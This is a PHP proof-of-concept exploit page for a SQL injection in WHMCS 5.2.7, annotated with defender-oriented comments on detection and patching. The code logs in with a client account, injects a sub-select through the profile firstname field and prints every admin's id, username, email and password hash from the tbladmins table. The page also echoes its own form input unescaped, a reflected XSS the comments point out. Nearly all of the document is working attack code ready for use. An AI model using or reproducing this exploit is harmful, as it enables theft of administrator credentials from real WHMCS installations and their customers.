- <!-- Page shell for a proof-of-concept whose title names a SQL injection in WHMCS 5.2.7.
-      The markup below only styles the page and shows a logo; the request logic is in the
-      PHP block that follows and the input form after it. -->
- <html>
- <head>
- <title>Master WHMCS 5.2.7 SQL inJecTion</title>
- <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
- <style type='text/css'>
- body{
- margin: 0;
- padding:0;
- background:black;
- color:white;
- font-family:"Times New Roman",Georgia,Serif;
- }
- </style>
- </head>
- <body >
- <center>
- <h1> Master WHMCS 5.2.7 SQL inJecTion</h1>
- <!-- The logo is hot-linked from the vendor's site over plain http, so every view of this
-      page makes a request to whmcs.com; that request may carry a Referer identifying where
-      the page is hosted. -->
- <img src="http://www.whmcs.com/wp-content/themes/whmcs/images/logo_whmcs.png" /> <br /><br />
- <?
- // Uses the short open tag, so it only runs where short_open_tag is enabled.
- //
- // What this block does, in order: logs in to a WHMCS install as an ordinary client, submits
- // a profile update whose firstname field is a SQL fragment, then reads the firstname value
- // back from the response and prints it.
- //
- // Defender view, from the requests visible below:
- //  - The sequence is login.php, dologin.php, clientarea.php?action=details (GET), then a POST
- //    to the same details URL, all with one fixed Firefox/18.0 on Windows NT 5.1 user agent.
- //  - The POST body carries firstname beginning with AES_ENCRYPT( and containing a SELECT on
- //    tbladmins; a WAF rule or request-body log can match on either string.
- //  - Afterwards the client's firstname is expected to hold id:username:email:password tuples
- //    from tbladmins, so such a value in a client record points to a successful run.
- //  - Response: apply the vendor's security update for this release and rotate admin
- //    credentials if such a record is found.
- if ($_POST['Submit1']){
- echo "";
- // Removes PHP's execution time limit for this request.
- set_time_limit(0);
- // cut(): returns the text in $top that lies between the first occurrence of $start and
- // the first occurrence of $end at or after it. Neither marker is checked for, so a missing
- // marker yields an empty or false result rather than an error (exact value: TODO confirm).
- function cut($start,$end,$top){
- $c =strlen($start);
- $desc= strstr("$top","$start");
- $count = strpos("$desc","$end");
- $desc = substr($desc,$c,$count-$c);
- return $desc;
- }
- // Form field "user" actually carries the target base URL (the form labels it "Site");
- // "email" and "pass" are the credentials of an existing client account on that site.
- // None of the three values is validated or encoded before use.
- $url= $_POST['user'];
- $user= $_POST['email'];
- $passw= $_POST['pass'];
- // Sub-select that joins id, username, email and password of every tbladmins row with ':'
- // (0x3a), rows separated by ', ' (0x2c20).
- $sqll= "SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins";
- // Creates or truncates cookie.txt in the working directory; $fp is never used or closed in
- // this listing. The file later holds the client's session cookies and may be web-readable
- // depending on where the script is deployed.
- $fp = fopen("cookie.txt", "w+");
- $Cookie = realpath('cookie.txt');
- // Request 1: GET the login page and pull the hidden "token" form value out of the HTML.
- // No cookie jar is attached to this request.
- $curl=curl_init();
- curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curl,CURLOPT_URL,"$url/login.php");
- curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0');
- curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($curl,CURLOPT_TIMEOUT,5);
- $exec=curl_exec($curl);
- curl_close($curl);
- $tok = cut('"token" value="','" />',$exec);
- // Request 2: submit the client credentials plus that token to dologin.php. Setting
- // CURLOPT_POSTFIELDS makes this a POST; the session cookies are written to cookie.txt.
- // The body is built by plain interpolation, without URL-encoding.
- $postd= "username=$user&password=$passw&token=$tok";
- $curl=curl_init();
- curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curl,CURLOPT_URL,"$url/dologin.php");
- curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0');
- curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($curl, CURLOPT_POSTFIELDS, $postd);
- curl_setopt($curl, CURLOPT_COOKIEJAR, "$Cookie");
- curl_setopt($curl,CURLOPT_TIMEOUT,5);
- $exez=curl_exec($curl);
- curl_close($curl);
- // Request 3: GET the client details page with the saved cookies to obtain the token that
- // the profile form expects. The login result in $exez is never checked.
- $curl=curl_init();
- curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curl,CURLOPT_URL,"$url/clientarea.php?action=details");
- curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0');
- curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($curl, CURLOPT_COOKIEFILE, "$Cookie");
- curl_setopt($curl,CURLOPT_TIMEOUT,5);
- $exes=curl_exec($curl);
- curl_close($curl);
- $tokZ = cut('"token" value="','" />',$exes);
- // The firstname field is sent as a SQL fragment instead of a name: a leading
- // AES_ENCRYPT(1,1) followed by a second assignment of firstname to the sub-select above.
- // NOTE(review): this presumably relies on the server's profile-update query passing values
- // that begin with AES_ENCRYPT( through as raw SQL; the server-side code is not on this page.
- $zz= "AES_ENCRYPT(1,1), firstname= ($sqll)";
- // All other profile fields are filled with constant dummy values; the body is again built
- // without URL-encoding, so the spaces and parentheses of the fragment go out raw.
- $ex="token=$tokZ&firstname=$zz&lastname=1&companyname=1&email=$user&paymentmethod=none&billingcid=0&address1=1&address2=1&city=1&state=1&postcode=1&country=US&phonenumber=1&save=Save+Changes";
- // Request 4: POST the profile update with the saved session cookies.
- $curl=curl_init();
- curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curl,CURLOPT_URL,"$url/clientarea.php?action=details");
- curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0');
- curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($curl, CURLOPT_POST, TRUE);
- curl_setopt($curl, CURLOPT_POSTFIELDS, $ex);
- curl_setopt($curl, CURLOPT_COOKIEFILE, "$Cookie");
- curl_setopt($curl,CURLOPT_TIMEOUT,5);
- $exef=curl_exec($curl);
- curl_close($curl);
- // Read the firstname input's value back out of the returned profile page.
- $Masterr = cut('="firstname" value="','" />',$exef);
- // A non-empty value is printed one record per line. It is echoed without HTML-escaping, so
- // whatever the remote site returned is rendered as markup in the viewer's browser.
- if(!empty($Masterr)){
- $Masterr= str_replace (',','<br />',$Masterr);
- echo "$Masterr";
- }
- else{
- echo "<h2>Failed .. !!</h2>";
- }
- }
- ?>
- <b>
- <!-- Self-posting form (empty ACTION) that feeds the PHP block on this page. The field named
-      "user" holds the target site URL, "email" and "pass" the client login. The pass field
-      is a plain text input, and all three submitted values are echoed back into the value
-      attributes without HTML-escaping, so a crafted value can break out of the attribute
-      (reflected XSS in the page itself). -->
- <FORM NAME ="form1" METHOD ="POST" ACTION ="">
- <br>
- Site : <INPUT NAME = "user" style="width: 410px; " value="<? echo $_POST['user'];?>"><br><br>
- mail : <INPUT NAME = "email" style="width: 410px; " value="<? echo $_POST['email'];?>"><br><br>
- pass : <INPUT NAME = "pass" style="width: 410px; " value="<? echo $_POST['pass'];?>"><br><br>
- <br> <INPUT TYPE = "Submit" Name = "Submit1" VALUE = "Expoit" style="width: 90px">
- </FORM>
- <!-- Author attribution as given in the paste. -->
- <p>Developped By The_Master</p>
- <p>Th3.M4st3r@Yahoo.CoM</p>
- <p>SEc4ever.CoM</p>
- </b>
- <!-- Markup is unbalanced here: the closing div has no opening tag in this listing, and the
-      center element is opened a second time instead of being closed. -->
- </div>
- <center></body>
- </html>